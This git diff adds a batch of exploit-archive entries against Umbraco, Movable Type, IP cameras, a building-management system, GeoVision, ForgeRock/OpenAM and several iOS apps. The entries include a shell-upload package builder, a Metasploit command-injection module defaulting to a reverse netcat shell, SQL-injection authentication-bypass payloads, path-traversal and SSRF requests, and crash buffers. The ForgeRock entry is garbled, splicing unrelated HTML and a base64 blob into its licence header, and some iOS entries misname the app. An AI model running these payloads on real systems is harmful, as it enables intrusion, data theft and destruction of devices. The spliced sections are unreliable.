diff --git a/exploits/aspx/webapps/50241.py b/exploits/aspx/webapps/50241.py
new file mode 100755
index 000000000..f4f22656b
--- /dev/null
+++ b/exploits/aspx/webapps/50241.py
@@ -0,0 +1,72 @@
+# Exploit Title: Umbraco CMS 8.9.1 - Path traversal and Arbitrary File Write (Authenticated)
+# Exploit Author: BitTheByte
+# Description: Authenticated path traversal vulnerability.
+# Exploit Research: https://www.tenable.com/security/research/tra-2020-59
+# Vendor Homepage: https://umbraco.com/
+# Version: <= 8.9.1
+# CVE : CVE-2020-5811
+
+import string
+import random
+import argparse
+import zipfile
+import os
+
+package_xml = f"""
+
+
+
+ {{filename}}
+ {{upload_path}}
+ {{filename}}
+
+
+
+
+ PoC-{''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(8))}
+ 1.0.0
+ MIT License
+ https://example.com
+
+ 0
+ 0
+ 0
+
+
+
+ CVE-2020-5811
+ https://example.com
+
+
+
+
+
+"""
+
+parser = argparse.ArgumentParser(description='CVE-2020-5811')
+parser.add_argument('--shell', type=str, help='Shell file to upload', required=True)
+parser.add_argument('--upload-path', type=str, help='Shell file update path on target server (default=~/../scripts)', default='~/../scripts')
+args = parser.parse_args()
+
+if not os.path.isfile(args.shell):
+ print("[ERROR] please use a correct path for the shell file.")
+
+output_file = "exploit.zip"
+
+package = zipfile.ZipFile(output_file, 'w')
+package.writestr('package.xml', package_xml.format(filename=os.path.basename(args.shell), upload_path=args.upload_path))
+package.writestr(os.path.basename(args.shell), open(args.shell, 'r').read())
+package.close()
+
+print(f"[DONE] Created Umbraco package: {output_file}")
\ No newline at end of file
diff --git a/exploits/aspx/webapps/50462.txt b/exploits/aspx/webapps/50462.txt
new file mode 100644
index 000000000..40e435432
--- /dev/null
+++ b/exploits/aspx/webapps/50462.txt
@@ -0,0 +1,28 @@
+# Exploit Title: Umbraco v8.14.1 - 'baseUrl' SSRF
+# Date: July 5, 2021
+# Exploit Author: NgoAnhDuc
+# Vendor Homepage: https://our.umbraco.com/
+# Software Link: https://our.umbraco.com/download/releases/8141
+# Version: v8.14.1
+# Affect: Umbraco CMS v8.14.1, Umbraco Cloud
+
+Vulnerable code:
+
+Umbraco.Web.Editors.HelpController.GetContextHelpForPage():
+https://github.com/umbraco/Umbraco-CMS/blob/710ecf2537a8630d00db793877d5c169c5cf8095/src/Umbraco.Web/Editors/HelpController.cs#L14
+Umbraco.Web.Editors.DashboardController.GetRemoteDashboardContent():
+https://github.com/umbraco/Umbraco-CMS/blob/710ecf2537a8630d00db793877d5c169c5cf8095/src/Umbraco.Web/Editors/DashboardController.cs#L50
+Umbraco.Web.Editors.DashboardController.GetRemoteDashboardCss():
+https://github.com/umbraco/Umbraco-CMS/blob/710ecf2537a8630d00db793877d5c169c5cf8095/src/Umbraco.Web/Editors/DashboardController.cs#L91
+
+PoC:
+
+/umbraco/BackOffice/Api/Help/GetContextHelpForPage?section=content&tree=undefined&baseUrl=https://SSRF-HOST.EXAMPLE
+/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent?section=TryToAvoidGetCacheItem111&baseUrl=
+https://SSRF-HOST.EXAMPLE/
+/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss?section=AvoidGetCacheItem&baseUrl=https://SSRF-HOST.EXAMPLE/
+
+Notes:
+- There's no "/" suffix in payload 1
+- "/" suffix is required in payload 2 and payload 3
+- "section" parameter value must be changed each exploit attempt
\ No newline at end of file
diff --git a/exploits/cgi/webapps/50464.rb b/exploits/cgi/webapps/50464.rb
new file mode 100755
index 000000000..15ed8400b
--- /dev/null
+++ b/exploits/cgi/webapps/50464.rb
@@ -0,0 +1,112 @@
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "Movable Type XMLRPC API Remote Command Injection",
+ 'Description' => %q{
+ This module exploit Movable Type XMLRPC API Remote Command Injection.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Etienne Gervais', # author & msf module,
+ 'Charl-Alexandre Le Brun' # author & msf module
+ ],
+ 'References' =>
+ [
+ ['CVE', '2021-20837'],
+ ['URL', 'https://movabletype.org/'],
+ ['URL', 'https://nemesis.sh/']
+ ],
+ 'DefaultOptions' =>
+ {
+ 'SSL' => false,
+ },
+ 'Platform' => ['linux'],
+ 'Arch' => ARCH_CMD,
+ 'Privileged' => false,
+ 'DisclosureDate' => "2021-10-20",
+ 'DefaultTarget' => 0,
+ 'Targets' => [
+ [
+ 'Automatic (Unix In-Memory)',
+ {
+ 'Platform' => 'unix',
+ 'Arch' => ARCH_CMD,
+ 'Type' => :unix_memory,
+ 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat' }
+ }
+ ]
+ ]
+ ))
+ register_options(
+ [
+ Opt::RPORT(80),
+ OptString.new('TARGETURI', [ true, 'The URI of the MovableType', '/cgi-bin/mt/'])
+ ], self.class
+ )
+ end
+
+ def cmd_to_xml(cmd, opts={})
+ base64_cmd = Rex::Text.encode_base64("`"+cmd+"`")
+ xml_body = <<~THISSTRING
+
+
+ mt.handler_to_coderef
+
+
+
+ #{base64_cmd}
+
+
+
+
+
+ THISSTRING
+ end
+
+ def check
+ begin
+ fingerprint = Rex::Text.rand_text_alpha(32)
+ command_payload = cmd_to_xml("echo "+fingerprint)
+
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path,'mt-xmlrpc.cgi'),
+ 'ctype' => 'text/xml; charset=UTF-8',
+ 'data' => command_payload
+ })
+
+ fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
+ fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP response code: #{res.code}") if res.code != 200
+
+ if res && res.body.include?("Can't locate "+fingerprint)
+ return Exploit::CheckCode::Vulnerable
+ end
+ rescue ::Rex::ConnectionError
+ fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+ end
+ Exploit::CheckCode::Safe
+ end
+
+ def exploit
+ begin
+ command_payload = cmd_to_xml(payload.raw)
+
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path,'mt-xmlrpc.cgi'),
+ 'ctype' => 'text/xml; charset=UTF-8',
+ 'data' => command_payload
+ })
+
+ rescue ::Rex::ConnectionError
+ fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+ end
+
+ end
+end
\ No newline at end of file
diff --git a/exploits/hardware/webapps/49459.txt b/exploits/hardware/webapps/49459.txt
new file mode 100644
index 000000000..14c307200
--- /dev/null
+++ b/exploits/hardware/webapps/49459.txt
@@ -0,0 +1,67 @@
+# Exploit Title: Selea Targa IP OCR-ANPR Camera - RTP/RTSP/M-JPEG Stream Disclosure (Unauthenticated)
+# Date: 07.11.2020
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.selea.com
+
+Selea Targa IP OCR-ANPR Camera Unauthenticated RTP/RTSP/M-JPEG Stream Disclosure
+
+
+Vendor: Selea s.r.l.
+Product web page: https://www.selea.com
+Affected version: Model: iZero
+ Targa 512
+ Targa 504
+ Targa Semplice
+ Targa 704 TKM
+ Targa 805
+ Targa 710 INOX
+ Targa 750
+ Targa 704 ILB
+ Firmware: BLD201113005214
+ BLD201106163745
+ BLD200304170901
+ BLD200304170514
+ BLD200303143345
+ BLD191118145435
+ BLD191021180140
+ BLD191021180140
+ CPS: 4.013(201105)
+ 3.100(200225)
+ 3.005(191206)
+ 3.005(191112)
+
+Summary: IP camera with optical character recognition (OCR) software for automatic
+number plate recognition (ANPR) also equipped with ADR system that enables it to read
+the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number
+of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number
+plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes
+this camera suitable for all installation conditions. Its built-in OCR software works
+as an automatic and independent system without the need of a computer, thus giving
+autonomy to the device even in the event of an interruption in the connection between
+the camera and the operations centre.
+
+Desc: The ANPR camera suffers from an unauthenticated and unauthorized live stream
+disclosure when p1.mjpg or p1.264 is called.
+
+Tested on: GNU/Linux 3.10.53 (armv7l)
+ PHP/5.6.22
+ selea_httpd
+ HttpServer/0.1
+ SeleaCPSHttpServer/1.1
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2021-5619
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5619.php
+
+
+07.11.2020
+
+--
+
+
+Connection to RTP/RTSP stream: rtsp://192.168.1.17/p1.264
+Connection to M-JPEG stream: http://192.168.1.17/p1.mjpg
\ No newline at end of file
diff --git a/exploits/hardware/webapps/49937.txt b/exploits/hardware/webapps/49937.txt
new file mode 100644
index 000000000..30aea47af
--- /dev/null
+++ b/exploits/hardware/webapps/49937.txt
@@ -0,0 +1,47 @@
+# Exploit Title: CHIYU IoT Devices - Denial of Service (DoS)
+# Date: 01/06/2021
+# Exploit Author: sirpedrotavares
+# Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html
+# Software Link: https://www.chiyu-tech.com/category-hardware.html
+# Version: BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC - all firmware versions < June 2021
+# Tested on: BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC
+# CVE: CVE-2021-31642
+# Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks
+
+Description: A denial of service condition exists after an integer overflow in several IoT devices from CHIYU Technology, including BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC. The vulnerability can be explored by sending an unexpected integer (> 32 bits) on the page parameter that will crash the web portal and making it unavailable until a reboot of the device.
+CVE ID: CVE-2021-31642
+CVSS: Medium- CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
+URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31642
+
+Affected parameter: page=Component: if.cgi
+Payload:
+if.cgi?redirect=AccLog.htm&failure=fail.htm&type=go_log_page&page=2781000
+
+====HTTP request======
+GET
+/if.cgi?redirect=AccLog.htm&failure=fail.htm&type=go_log_page&page=2781000
+HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)
+Gecko/20100101 Firefox/87.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3
+Accept-Encoding: gzip, deflate
+Authorization: Basic YWRtaW46YWRtaW4=
+Connection: close
+Referer: http://127.0.0.1/AccLog.htm
+Cookie: fresh=
+Upgrade-Insecure-Requests: 1
+
+
+
+Steps to reproduce:
+ 1. Navigate to the vulnerable device
+ 2. Make a GET request to the CGI component (if.cgi)
+ 3. Append the payload at the end of the vulnerable parameter (page)
+ 4. Submit the request and observe payload execution
+
+
+ Mitigation: The latest version of the CHIYU firmware should be installed
+to mitigate this vulnerability.
\ No newline at end of file
diff --git a/exploits/hardware/webapps/50146.txt b/exploits/hardware/webapps/50146.txt
new file mode 100644
index 000000000..b4ae9538b
--- /dev/null
+++ b/exploits/hardware/webapps/50146.txt
@@ -0,0 +1,62 @@
+# Exploit Title: KevinLAB BEMS 1.0 - Unauthenticated SQL Injection / Authentication Bypass
+# Date: 05.07.2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: http://www.kevinlab.com
+
+Vendor: KevinLAB Inc.
+Product web page: http://www.kevinlab.com
+Affected version: 4ST L-BEMS 1.0.0 (Building Energy Management System)
+
+Summary: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy
+management platform. KevinLAB's BEMS (Building Energy Management System) enables
+efficient energy management in buildings. It improves the efficient of energy use
+by collecting and analyzing various information of energy usage and facilities in
+the building. It also manages energy usage, facility efficiency and indoor environment
+control.
+
+Desc: The application suffers from an unauthenticated SQL Injection vulnerability.
+Input passed through 'input_id' POST parameter in '/http/index.php' is not properly
+sanitised before being returned to the user or used in SQL queries. This can be exploited
+to manipulate SQL queries by injecting arbitrary SQL code and bypass the authentication
+mechanism.
+
+Tested on: Linux CentOS 7
+ Apache 2.4.6
+ Python 2.7.5
+ PHP 5.4.16
+ MariaDB 5.5.68
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2021-5655
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5655.php
+
+
+05.07.2021
+
+--
+
+
+PoC POST data payload (extract):
+--------------------------------
+
+POST /http/index.php HTTP/1.1
+Host: 192.168.1.3
+
+requester=login
+request=login
+params=[{"name":"input_id","value":"USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy"},{"name":"input_passwd","value":"PASSWORD"},{"name":"device_id","value":"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"},{"name":"checked","value":false},{"name":"login_key","value":""}]
+
+
+PoC POST data payload (authbypass):
+-----------------------------------
+
+POST /http/index.php HTTP/1.1
+Host: 192.168.1.3
+
+requester=login
+request=login
+params=[{"name":"input_id","value":"USERNAME' or 1=1--},{"name":"input_passwd","value":"PASSWORD"},{"name":"device_id","value":"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"},{"name":"checked","value":false},{"name":"login_key","value":""}]
\ No newline at end of file
diff --git a/exploits/hardware/webapps/50172.txt b/exploits/hardware/webapps/50172.txt
new file mode 100644
index 000000000..54042d3ff
--- /dev/null
+++ b/exploits/hardware/webapps/50172.txt
@@ -0,0 +1,79 @@
+# Exploit Title: Panasonic Sanyo CCTV Network Camera 2.03-0x - 'Disable Authentication / Change Password' CSRF
+# Date: 13.07.2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.panasonic.com
+
+
+
+
+ [CSRF]
+[Anonymous user log in = ON]
+orororororororororororororor
+ [Change admin password]
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/hardware/webapps/50211.txt b/exploits/hardware/webapps/50211.txt
new file mode 100644
index 000000000..ac43f9743
--- /dev/null
+++ b/exploits/hardware/webapps/50211.txt
@@ -0,0 +1,37 @@
+# Exploit Title: GeoVision Geowebserver 5.3.3 - LFI / XSS / HHI / RCE
+# DynamicDNS Network to find: DIPMAP.COM / GVDIP.COM
+# Date: 6-16-21 (Vendor Notified)
+# Exploit Author: Ken 's1ngular1ty' Pyle
+# Vendor Homepage: https://www.geovision.com.tw/cyber_security.php
+# Version: <= 5.3.3
+# Tested on: Windows 20XX / MULTIPLE
+# CVE : https://www.geovision.com.tw/cyber_security.php
+
+GEOVISION GEOWEBSERVER =< 5.3.3 are vulnerable to several XSS / HTML Injection / Local File Include / XML Injection / Code execution vectors. The application fails to properly sanitize user requests. This allows injection of HTML code and XSS / client side exploitation, including session theft:
+
+Nested Exploitation of the LFI, XSS, HTML / Browser Injection:
+
+GET /Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name= HTTP/1.1
+
+Absolute exploitation of the LFI:
+
+POST /Visitor/bin/WebStrings.srf?obj_name=win.ini
+
+GET /Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows\win.ini
+
+Additionally, the vendor has issued an ineffective / broken patch (https://www.geovision.com.tw/cyber_security.php) which does not appear to remediate or address the problem. Versions 5.3.3 and below continue to be affected. This is acknowledged by the vendor.
+
+
+ex. obj_name=INJECTEDHTML / XSS
+
+The application fails to properly enforce permissions and sanitize user request. This allows for LFI / Remote Code Execution through several vectors:
+
+ex. /Visitor//%252e(path to target)
+
+These vectors can be blended / nested to exfiltrate data in a nearly undetectable manner, through the API:
+
+The devices are vulnerable to HOST HEADER POISONING and CROSS-SITE REQUEST FORGERY against the web application. These can be used for various vectors of attack.
+
+These attacks were disclosed as part of the IOTVillage Presentation:
+
+ https://media.defcon.org/DEF%20CON%2029/DEF%20CON%2029%20villages/DEFCON%2029%20IoT%20Village%20-%20Ken%20Pyle%20-%20BLUEMONDAY%20Series%20Exploitation%20and%20Mapping%20of%20Vulnerable%20Devices%20at%20Scale.mp4
\ No newline at end of file
diff --git a/exploits/hardware/webapps/50250.txt b/exploits/hardware/webapps/50250.txt
new file mode 100644
index 000000000..93221ce83
--- /dev/null
+++ b/exploits/hardware/webapps/50250.txt
@@ -0,0 +1,16 @@
+# Exploit Title: Compro Technology IP Camera - 'killps.cgi' Denial-of-Service (DoS)
+# Date: 2021-09-30
+# Exploit Author: icekam,xiao13,Rainbow,tfsec
+# Software Link: http://www.comprotech.com.hk/
+# Version: Compro IP70 2.08_7130218, IP570 2.08_7130520, IP60, TN540
+# CVE : CVE-2021-40378
+
+There is a backdoor prefabricated in the device in this path. Accessing the
+file through the browser after logging in will cause the device to delete
+all data (including the data of the camera itself).
+
+Payload:Visit this page after logging in
+/cgi-bin/support/killps.cgi
+
+please refer to:
+https://github.com/icekam/0day/blob/main/Compro-Technology-Camera-has-multiple-vulnerabilities.md
\ No newline at end of file
diff --git a/exploits/ios/dos/49883.py b/exploits/ios/dos/49883.py
new file mode 100755
index 000000000..e45d5a843
--- /dev/null
+++ b/exploits/ios/dos/49883.py
@@ -0,0 +1,23 @@
+# Exploit Title: WebSSH for iOS 14.16.10 - 'mashREPL' Denial of Service (PoC)
+# Author: Luis Martinez
+# Discovery Date: 2021-05-18
+# Vendor Homepage: https://apps.apple.com/mx/app/webssh-ssh-client/id497714887
+# Software Link: App Store for iOS devices
+# Tested Version: 14.16.10
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: iPhone 7 iOS 14.5.1
+
+# Steps to Produce the Crash:
+# 1.- Run python code: WebSSH_for_iOS_14.16.10.py
+# 2.- Copy content to clipboard
+# 3.- Open "WebSSH for iOS"
+# 4.- Click -> Tools
+# 5.- Click -> mashREPL
+# 6.- Paste ClipBoard on "mashREPL>"
+# 7.- Intro
+# 8.- Crashed
+
+#!/usr/bin/env python
+
+buffer = "\x41" * 300
+print (buffer)
\ No newline at end of file
diff --git a/exploits/ios/dos/49952.py b/exploits/ios/dos/49952.py
new file mode 100755
index 000000000..6d5296fdb
--- /dev/null
+++ b/exploits/ios/dos/49952.py
@@ -0,0 +1,35 @@
+# Exploit Title: Color Notes 1.4 - Denial of Service (PoC)
+# Date: 06-04-2021
+# Author: Geovanni Ruiz
+# Download Link: https://apps.apple.com/gt/app/color-notes/id830515136
+# Version: 1.4
+# Category: DoS (iOS)
+
+##### Vulnerability #####
+
+Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note:
+
+# STEPS #
+# Open the program.
+# Create a new Note.
+# Run the python exploit script payload.py, it will create a new payload.txt file
+# Copy the content of the file "payload.txt"
+# Paste the content from payload.txt twice in the new Note.
+# Crashed
+
+Successful exploitation will cause the application to stop working.
+
+I have been able to test this exploit against iOS 14.2.
+
+##### PoC #####
+--> payload.py <--
+#!/usr/bin/env python
+buffer = "\x41" * 350000
+
+try:
+f = open("payload.txt","w")
+f.write(buffer)
+f.close()
+print ("File created")
+except:
+print ("File cannot be created")
\ No newline at end of file
diff --git a/exploits/ios/dos/49953.py b/exploits/ios/dos/49953.py
new file mode 100755
index 000000000..86a498847
--- /dev/null
+++ b/exploits/ios/dos/49953.py
@@ -0,0 +1,35 @@
+# Exploit Title: Macaron Notes great notebook 5.5 - Denial of Service (PoC)
+# Date: 06-04-2021
+# Author: Geovanni Ruiz
+# Download Link: https://apps.apple.com/us/app/macaron-notes-great-notebook/id1079862221
+# Version: 5.5
+# Category: DoS (iOS)
+
+##### Vulnerability #####
+
+Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note:
+
+# STEPS #
+# Open the program.
+# Create a new Note.
+# Run the python exploit script payload.py, it will create a new payload.txt file
+# Copy the content of the file "payload.txt"
+# Paste the content from payload.txt twice in the new Note.
+# Crashed
+
+Successful exploitation will cause the application to stop working.
+
+I have been able to test this exploit against iOS 14.2.
+
+##### PoC #####
+--> payload.py <--
+#!/usr/bin/env python
+buffer = "\x41" * 350000
+
+try:
+ f = open("payload.txt","w")
+ f.write(buffer)
+ f.close()
+ print ("File created")
+except:
+ print ("File cannot be created")
\ No newline at end of file
diff --git a/exploits/ios/dos/49954.py b/exploits/ios/dos/49954.py
new file mode 100755
index 000000000..66e9c636c
--- /dev/null
+++ b/exploits/ios/dos/49954.py
@@ -0,0 +1,35 @@
+# Exploit Title: My Notes Safe 5.3 - Denial of Service (PoC)
+# Date: 06-04-2021
+# Author: Geovanni Ruiz
+# Download Link: https://apps.apple.com/us/app/my-notes-safe/id689971781
+# Version: 5.3
+# Category: DoS (iOS)
+
+##### Vulnerability #####
+
+Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note:
+
+# STEPS #
+# Open the program.
+# Create a new Note.
+# Run the python exploit script payload.py, it will create a new payload.txt file
+# Copy the content of the file "payload.txt"
+# Paste the content from payload.txt twice in the new Note.
+# Crashed
+
+Successful exploitation will cause the application to stop working.
+
+I have been able to test this exploit against iOS 14.2.
+
+##### PoC #####
+--> payload.py <--
+#!/usr/bin/env python
+buffer = "\x41" * 350000
+
+try:
+ f = open("payload.txt","w")
+ f.write(buffer)
+ f.close()
+ print ("File created")
+except:
+ print ("File cannot be created")
\ No newline at end of file
diff --git a/exploits/ios/dos/49979.py b/exploits/ios/dos/49979.py
new file mode 100755
index 000000000..0fb3bf745
--- /dev/null
+++ b/exploits/ios/dos/49979.py
@@ -0,0 +1,35 @@
+# Exploit Title: n+otes 1.6.2 - Denial of Service (PoC)
+# Date: 06-09-2021
+# Author: Geovanni Ruiz
+# Download Link: https://apps.apple.com/us/app/n-otes/id596895960
+# Version: 1.6.2
+# Category: DoS (iOS)
+
+##### Vulnerability #####
+
+Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note:
+
+# STEPS #
+# Open the program.
+# Create a new Note.
+# Run the python exploit script payload.py, it will create a new payload.txt file
+# Copy the content of the file "payload.txt"
+# Paste the content from payload.txt twice in the new Note.
+# Crashed
+
+Successful exploitation will cause the application to stop working.
+
+I have been able to test this exploit against iOS 14.2.
+
+##### PoC #####
+--> payload.py <--
+#!/usr/bin/env python
+buffer = "\x41" * 350000
+
+try:
+ f = open("payload.txt","w")
+ f.write(buffer)
+ f.close()
+ print ("File created")
+except:
+ print ("File cannot be created")
\ No newline at end of file
diff --git a/exploits/java/webapps/50131.py b/exploits/java/webapps/50131.py
new file mode 100755
index 000000000..045d7444f
--- /dev/null
+++ b/exploits/java/webapps/50131.py
@@ -0,0 +1,152 @@
+# Exploit Title: ForgeRock Access Manager/OpenAM 14.6.3 - Remote Code Execution (RCE) (Unauthenticated)
+# Date: 2021-07-14
+# Exploit Author: Photubias – tijl[dot]deneut[at]Howest[dot]be for www.ic4.be
+# Vendor Advisory: [1] https://backstage.forgerock.com/knowledge/kb/article/a47894244
+# Vendor Homepage: https://github.com/OpenIdentityPlatform/OpenAM/
+# Version: [1] OpenAM 14.6.3
+# [2] Forgerock 6.0.0.x and all versions of 6.5, up to and including 6.5.3, and is fixed as of version AM 7 released on June 29, 2021
+# Tested on: OpenAM 14.6.3 and Tomcat/8.5.68 with JDK-8u292 on Debian 10
+# CVE: CVE-2021-35464
+
+#!/usr/bin/env python3
+
+'''
+ Copyright 2021 Photubias(c)
+
+ This program is free software: you can redistribute it and/or modify
+ it under the terms of the GNU General Public License as published by
+ the Free Software Foundation, either version 3 of the License, or
+ (at your option) any later version.
+
+ This program is distributed in the hope that it will be useful,
+ but WITHOUT ANY WARRANTY; without even the implied warranty of
+ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ GNU General Public License for more details.
+
+ You should have received a copy of the GNU General Public License
+ along with this program. If not, see Hello Clover Admin! Hello Clover Admin! Please wait here, content is loading... "
+ + ""
+ + " "
+ + " "
+ + " "
+ + " "
+ + ""
+ + ""
+ + ""
+ + ""
+ + "")
+
+ self.wfile.write(bytes(html,"utf-8"))
+
+
+base64_enc_viewstatecracker = "CnB1YmxpYyBjbGFzcyBWaWV3c3RhdGVDcmFja2VyIHsKICAvKiBTVEFSVCBQQVJUIDEgKi8KICBwdWJsaWMgc3RhdGljIGZpbmFsIGludCBvZmZzZXQgICAgID0gMzI7CiAgcHVibGljIHN0YXRpYyBmaW5hbCBpbnQgaXRlcmF0aW9ucyA9IDY1NTM2OwoKICBwdWJsaWMgc3RhdGljIGZpbmFsIFN0cmluZyBnZW5lcmF0ZU5ld1ZpZXdzdGF0ZShmaW5hbCBsb25nIGlkSW5Mb2dpY2FsTWFwLCBmaW5hbCBsb25nIGlkSW5BY3R1YWxNYXApIHsKICAgIGZpbmFsIGxvbmcgZmlyc3QzMkJpdHNPZklkSW5Mb2dpY2FsTWFwICA9IGlkSW5Mb2dpY2FsTWFwID4+PiBvZmZzZXQ7CiAgICBmaW5hbCBsb25nIHNlY29uZDMyQml0c09mSWRJbkxvZ2ljYWxNYXAgPSAoKGlkSW5Mb2dpY2FsTWFwIDw8IG9mZnNldCkgPj4+IG9mZnNldCk7CiAgICBmaW5hbCBsb25nIGZpcnN0MzJCaXRzT2ZJZEluQWN0dWFsTWFwICAgPSBpZEluQWN0dWFsTWFwID4+PiBvZmZzZXQ7ICAgICAgICAgLy8gVmVyaWZpY2F0aW9uCiAgICBmaW5hbCBsb25nIHNlY29uZDMyQml0c09mSWRJbkFjdHVhbE1hcCAgPSAoKGlkSW5BY3R1YWxNYXAgPDwgb2Zmc2V0KSA+Pj4gb2Zmc2V0KTsgLy8gVmVyaWZpY2F0aW9uCiAgICAvKiBFTkQgUEFSVCAxICovCgogICAgLyogU1RBUlQgUEFSVCAyICovCiAgICBsb25nIHRoZV9zZWVkID0gMUw7CgogICAgZm9yIChpbnQgaSA9IDA7IGkgPCBpdGVyYXRpb25zOyBpKyspIHsKICAgICAgbG9uZyB0bXBfc2VlZCA9ICgoZmlyc3QzMkJpdHNPZklkSW5Mb2dpY2FsTWFwIDw8IDE2KSArIGkpOwogICAgICBpZiAoKChpbnQpKCgodG1wX3NlZWQgKiAweDVERUVDRTY2REwgKyAweEJsKSAmICgoMUwgPDwgNDgpIC0gMSkpID4+PiAxNikpID09IHNlY29uZDMyQml0c09mSWRJbkxvZ2ljYWxNYXApIHsKICAgICAgICAvL1N5c3RlbS5vdXQucHJpbnRsbigiU2VlZCBmb3VuZDogIiArIHRtcF9zZWVkKTsKICAgICAgICB0aGVfc2VlZCA9IHRtcF9zZWVkOwogICAgICAgIGJyZWFrOwogICAgICB9CiAgICB9CiAgICAvKiBFTkQgUEFSVCAyICovCgogICAgLyogU1RBUlQgUEFSVCAzICovCiAgICAvLyBHZW5lcmF0ZSBudW1iZXIgMiAoU2Vjb25kIE51bWJlciBvZiBpZEluTG9naWNhbE1hcCkKICAgIHRoZV9zZWVkID0gKHRoZV9zZWVkICogMHg1REVFQ0U2NkRMICsgMHhCTCkgJiAoKDFMIDw8IDQ4KSAtIDEpOwoKICAgIC8vQ2FsY3VsYXRlIHRoZSB2YWx1ZSBvZiBpZEluQWN0dWFsTWFwCiAgICB0aGVfc2VlZCA9ICh0aGVfc2VlZCAqIDB4NURFRUNFNjZETCArIDB4QkwpICYgKCgxTCA8PCA0OCkgLSAxKTsKICAgIHRoZV9zZWVkID0gKHRoZV9zZWVkICogMHg1REVFQ0U2NkRMICsgMHhCTCkgJiAoKDFMIDw8IDQ4KSAtIDEpOwogICAgLyogRU5EIFBBUlQgMyovCgogICAgLyogU1RBUlQgUEFSVCA0Ki8KICAgIC8qIENhbGN1bGF0ZSBhIG5ldyBpZEluTG9naWNhbE1hcCAqLwoKICAgIC8vIEdlbmVyYXRlIHRoZSBmaXJzdCBoYWxmIG9mIHRoZSBmaXJzdCBMb25nCiAgICB0aGVfc2VlZCA9ICh0aGVfc2VlZCAqIDB4NURFRUNFNjZETCArIDB4QkwpICYgKCgxTCA8PCA0OCkgLSAxKTsKICAgIGludCBudW1iZXJfNSA9ICgoaW50KSh0aGVfc2VlZCA+Pj4gMTYpKTsKCiAgICAvLyBHZW5lcmF0ZSB0aGUgc2Vjb25kIGhhbGYgb2YgdGhlIGZpcnN0IExvbmcKICAgIHRoZV9zZWVkID0gKHRoZV9zZWVkICogMHg1REVFQ0U2NkRMICsgMHhCTCkgJiAoKDFMIDw8IDQ4KSAtIDEpOwogICAgaW50IG51bWJlcl82ID0gKChpbnQpKHRoZV9zZWVkID4+PiAxNikpOwoKICAgIC8vSGVyZSBpcyB0aGUgbmV3IGlkSW5Mb2dpY2FsTWFwCiAgICBsb25nIG5ld19sb25nXzEgPSAoKChsb25nKW51bWJlcl81IDw8IDMyKSArIG51bWJlcl82KTsKCgogICAgLyogQ2FsY3VsYXRlIGEgbmV3IGlkSW5BY3R1YWxNYXAgKi8KCiAgICAvLyBHZW5lcmF0ZSB0aGUgZmlyc3QgaGFsZiBvZiB0aGUgc2Vjb25kIExvbmcKICAgIHRoZV9zZWVkID0gKHRoZV9zZWVkICogMHg1REVFQ0U2NkRMICsgMHhCTCkgJiAoKDFMIDw8IDQ4KSAtIDEpOwogICAgaW50IG51bWJlcl83ID0gKChpbnQpKHRoZV9zZWVkID4+PiAxNikpOwoKICAgIC8vIEdlbmVyYXRlI